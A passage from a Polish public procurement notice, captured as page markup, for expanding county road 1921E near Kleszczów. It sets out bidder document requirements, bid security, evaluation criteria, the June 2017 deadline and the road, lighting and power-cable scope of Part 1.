spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert umożliwiającą realizację zamówienia zgodnie z 5.1.2.2) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty; wymagane potwierdzenie wykonania robót określonych pkt 5.1.3 z wykorzystaniem wzoru określonego w dodatku do SIWZ;</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Formularz ofertowy, podpisany przez osobę prawidłowo umocowaną wraz z załącznikami do oferty dotyczącymi Wykazu doświadczenia kadry kierującej robotami budowlanymi. 2. Wykonawca możne w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosowanych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Zobowiązanie, o którym mowa w zdaniu pierwszym Wykonawca załącza do oferty w formie pisemnej. Z dokumentu (np. zobowiązania) musi wynikać w szczególności:1) zakres dostępnych Wykonawcy zasobów innego podmiotu; 2) sposób wykorzystania zasobów innego podmiotu, prze Wykonawcę, przy wykonaniu zamówienia publicznego; 3)zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego; 4) czy podmiot, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą. 3. W przypadku, gdy Wykonawcę reprezentuje Pełnomocnik, do oferty musi być załączone pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy. Pełnomocnictwo należy załączyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza. sytuacji, w której Pełnomocnik działa na podstawi innego pełnomocnictwa lub pełnomocnictw (tzw. ciąg pelnomocnictw0, wówczas takie pełnomocnictwo (-a) winno zostać załączone w formie oryginałów lub kopii poświadczonych za zgodność z oryginałem przez notariusza. 4. W terminie 3 dni od zamieszczenia na stronie internetowej Zamawiającego informacji z otwarcia ofert, o której mowa w art. 86 ust. 3 Pzp, bez uprzedniego wezwania przez Zamawiającego, przekazuje Zmawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pp z innym Wykonawcą lub Wykonawcami, którzy złożyli oferty lub oferty częściowe. Wraz ze złożeniem oświadczenia Wykonawca może przedstawić dowody, że powiązania innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzieleniu zamówienia publicznego</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Oferta musi być zabezpieczona wadium w wysokości:Dla części 1: 200 000,00 zł (słownie: dwieście tysięcy złotych 00/100)Dla części 2:105 000,00 zł (słownie: sto pięć tysięcy złotych 00/100)</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani">Nie</span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>wydłużenie okresu gwarancji i rękojmi </TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>doświadczenie kadry kierującej robotami budowlanymi</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>skrócenie terminu realizacji umowy </TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja wieloetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"></span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Przewiduje się istotne zmiany postanowień zawartej mowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zakres i charakter zmian oraz warunki wprowadzenia zmian określono w pkt 31 projektu umowy, który stanowi dodatek do Specyfikacji Istotnych Warunków Zamówienia.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-06-14</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">13:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Część 1 : ,,Rozbudowa drogi powiatowej 1921E na odcinku od skrzyżowania z ul. Przemysłową i Łączną w Kleszczowie (101417E) do wsi Łuszczanowice (ul. Ogrodowa) wraz z infrastrukturą techniczną o dł. drogi ok. 1,2km"</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>I.	Branża drogowa - w szczególności :a.	roboty przygotowawcze, roboty rozbiórkowe, wycinka drzew i krzewów kolidujących z przedsięwzięciem, roboty ziemne, niwelacja terenu, nasypy, przestawienie krzyża - kapliczki wraz z wykonaniem nowego kamiennego cokołu i nowego fundamentu, przestawienie istniejących masztów flagowych oraz tablicy reklamowej wielkogabarytowej wraz z wykonaniem nowych fundamentów,b.	rozbudowa jezdni o nawierzchni asfaltowej, c.	budowa chodników o nawierzchni z kostki szlachetnej śrutowanej betonowej fazowej gr. 8cm, imitującej granit, w kolorze ,,białym" (co najmniej 60% posypki w kolorze biały) o kształcie - min. trzech szerokościach i jednej wysokości, uwaga: Zamawiający nie wklucza dopuszczenia (zmiany) innego kształtu i koloru kostki (nieprzemysłowej) co zostanie ustalone na etapie realizacji. Na etapie realizacji Wykonawca ma obowiązek przedstawić co najmniej trzy rodzaje (trzy w zakresie koloru i trzy w zakresie kształtu) kostki do wyboru Zamawiającemu. d.	budowa ścieżki rowerowej, ciągów pieszo-rowerowych o nawierzchni z kostki betonowej bezfazowej gr. 8cm w kolorze czerwonym barwionej w masie (o intensywnej barwie), Uwaga - ciąg ścieżki rowerowej i ciągu pieszo-rowerowego na skrzyżowaniu ze zjazdem winien być zachowany. Na etapie realizacji Wykonawca ma obowiązek przedstawić co najmniej trzy rodzaje kostki do wyboru Zamawiającemu.e.	przebudowa istniejących i budowa nowych zjazdów indywidualnych i publicznych z kostki szlachetnej śrutowanej betonowej fazowej gr. 8cm, imitującej granit, w kolorze ,,grafitowej/czarnej" (co najmniej 60% posypki w kolorze czarnym/grafitowym) o kształcie - min. trzech szerokościach i jednej wysokości. Uwaga: Zamawiający nie wklucza dopuszczenia (zmiany) innego kształtu i koloru kostki (nieprzemysłowej) co zostanie ustalone na etapie realizacji. Na etapie realizacji Wykonawca ma obowiązek przedstawić co najmniej trzy rodzaje (co najmniej trzy w zakresie koloru i co najmniej trzy w zakresie kształtu) kostki do wyboru Zamawiającemu. Zjazdy dostosować do zagospodarowania terenu przyległego.f.	wbudowanie krawężników 15x30 kamiennych na ławie z oporem (poza krawężnikami na zakończeniach zjazdów), stosować krawężniki łukowe na łukach, krawężniki przyjezdniowe winny mieć ściętą ostrą krawędzią od strony jezdni, na skosach przy zjazdach stosować krawężniki cięte fabrycznie, na zjazdach stosować krawężniki najazdowe, stosować krawężniki o usystematyzowanej długości 1mb, nie dopuszcza się stosowania na łukach krawężników prostych, Uwaga: zmiana w stosunku do projektu z wym. 20x30cm g.	wbudowanie krawężników 20x30 kamiennych na ławie z oporem na wyspach kanalizujących i środkowej wyspie ronda, stosować krawężniki łukowe na łukach, na skosach przy przejściach i przejazdach stosować krawężniki cięte fabrycznie, stosować krawężniki o usystematyzowanej długości 1mb, nie dopuszcza się stosowania na łukach krawężników prostych, h.	wbudowanie krawężników betonowych na zakończeniach zjazdów 15x30, na ławie z oporem,i.	wbudowanie obrzeży betonowych 8x30 w kolorze szarym na ławie z oporem,j.	budowa połączenia poszczególnych zadań tj. na skrzyżowaniu z ul. Łączną oraz w rejonie skrzyżowania w Łuszczanowicach, w przypadku nie zrealizowania pełnego zakresu układu drogowego przez odrębnego wykonawcę - Wykonawca jest zobowiązany nawiązać się do stanu istniejącego, k.	Uwaga: należy doliczyć do oferty: demontaż i ponowny montaż oznakowania aktywnego znajdującego się na skrzyżowaniu z ul. Łączną tj. wykonanie wraz z zatwierdzeniem projektu zmiany stałej organizacji ruchu dla montażu oznakowania aktywnego w miejscu wskazanym przez Zamawiającego (zostanie określone w trakcie trwania robot), demontaż oznakowania i przeniesienie w nowie miejsce wraz ze sprawdzeniem stanu technicznego oznakowania, wprowadzenie stałej organizacji ruchu w nowej lokalizacji znaków aktywnych, l.	wprowadzenie stałej organizacji ruchu: znaki pionowe - wielkość średnia, folia II generacji, oznakowanie poziome grubowarstwowe, strukturalne, znaki aktywne, odblaski, m.	roboty wykończeniowe, założenie trawników na pozostałym terenie pasa drogowego (humusowanie i obsianie trawą), na środkowej wyspie ronda wykonanie trawnika z rolki, II.	Branża elektrycznaII.1. Budowa oświetlenia ulicznego:a.	Budowa linii kablowej oświetlenia ulicznego przy projektowanym rondzie o długości około 300m (długość kabla) - linia kablowa typu YAKXS 4x35mm2 + FeZn 25x4mm, oprawy LED z autonomicznym układem redukcji mocy, podwieszone na słupach aluminiowych anodowanych okrągłych z wysięgnikami trójramiennymi. b.	Redukcje mocy dla wszystkich opraw LED instalowanych w ramach przedmiotowej inwestycji należy zrealizować następująco:- od momentu włączenia opraw do 23:00 - 100%- od 23:00 do 5:00 - 70%- od 5:00 do wyłączenia opraw nad ranem - 100% c.	Przed zamówieniem materiałów należy uzgodnić z Zamawiającym kolorystykę, sylwetki latarń oświetleniowych (słupy, wysięgniki) i szczegóły wykonania, aby zachować podobny jednolity standard i wygląd budowanego oświetlenia na danych odcinkach dróg. Sporządzić i przedstawić do zatwierdzenia przez Zamawiającego i Inspektora nadzoru rysunki wymiarowe kompletnych latarń oświetleniowych (rysunki poglądowe) oraz obliczenia doboru zaproponowanych opraw oświetleniowych. Temperatura barwowa źródeł światła nie większa niż 3000 K. Przed rozpoczęciem robót uzgodnić z Zamawiającym i Inspektorem nadzoru jednolitą i spójną numerację i oznaczenia latarń oświetleniowych.d.	Przełożenie odcinka linii kablowej oświetleniowej.II.2. Budowa sieci elektroenergetycznej: a.	Budowa linii kablowych 0,4kV ze stacji STP-6 - typu YAKXS 4x240mm2 + FeZn 30x4mm o łącznej długości około 3080m (długość kabla), wraz ze złączami kablowo-pomiarowymi nr ZKP 6.3.1; ZKP 6.3.2; ZKP 6.3.6; ZKP 6.3.8; ZKP 6.3.9; ZKP 6.3.10, ZKP 6.2.1; ZKP 6.2.5; ZKP 6.2.8; ZKP 6.2.11; ZKP 6.1.9.b.	Budowa wzdłuż linii 0,4kV rurociągu kablowego światłowodowego jednootworowego z rury HDPE 40/3,7 wraz z kablem światłowodowym, dla potrzeb zdalnego odczytu danych z liczników (Smart Meteringu) relacji stacja STP-6 - złącze kablowo-pomiarowe ZKP 6.3.2. oraz budowa rurociągu kablowego jednootworowego z rury HDPE 4,0/3,7 wraz z kablem światłowodowym relacji stacja STP-6 - zasobnik światłowodowy w ul. Łącznej.c.	Wykonanie złącza ZKP 6.3.2. na wzór złącza ZKP 6.1.1.d.	Przeniesienie urządzeń systemu Smart Meteringu ze złącza ZKP 6.1.1 do złącza ZKP 6.3.2 wraz z kablem światłowodowym. e.	Montaż liczników oraz wykonanie systemu Smart Meteringu dla liczników energii elektrycznej zainstalowanych w wybudowanej sieci. f.	Opracowanie instrukcji eksploatacji dla sieci elektroenergetycznej rozbudowanej w ramach niniejszego zadania (linie SN, nn i stacje transformatorowe).g.	Przełożenie odcinka linii kablowej 0,4 kV.Ważne - w ofercie uwzględnić dodatkowo: 1.	Obudowa szafki sterowniczej oświetlenia wykonana z tworzywa termoutwardzalnego powinna być zabezpieczona przed promieniowaniem UV, erozją i graffiti. 2.	W przypadkach, kiedy będą wykonywane wykopy pod infrastrukturę elektroenergetyczną w bezpośrednim sąsiedztwie istniejących chodników i ścieżek rowerowych w razie ich uszkodzenia należy je odtworzyć wraz z warstwami konstrukcyjnymi.3.	Zakup i ułożenie kabla światłowodowego relacji stacja STP-6 - zasobnik w ul. Łącznej, mufy światłowodowej dla kabla 12J, która jest przewidziana do zasobnika w ul. Łącznej, podłączenie kabla w stacji STP-6, wykonanie pomiarów pomontażowych.4.	Zakup kompletnej latarni oświetleniowej (m.in. fundament, słup, wysięgnik, oprawa LED) wg wzoru z ul. Łącznej. 5.	Demontaż dwóch latarń oświetleniowych przy ulicach Łącznej i Ogrodowej oraz zamontowanie ich przy ul. Sportowej po uprzednim zdemontowaniu dwóch latarń.6.	Materiały z rozbiórek linii kablowych oprócz fundamentu, słupa, wysięgnika i oprawy oświetleniowej 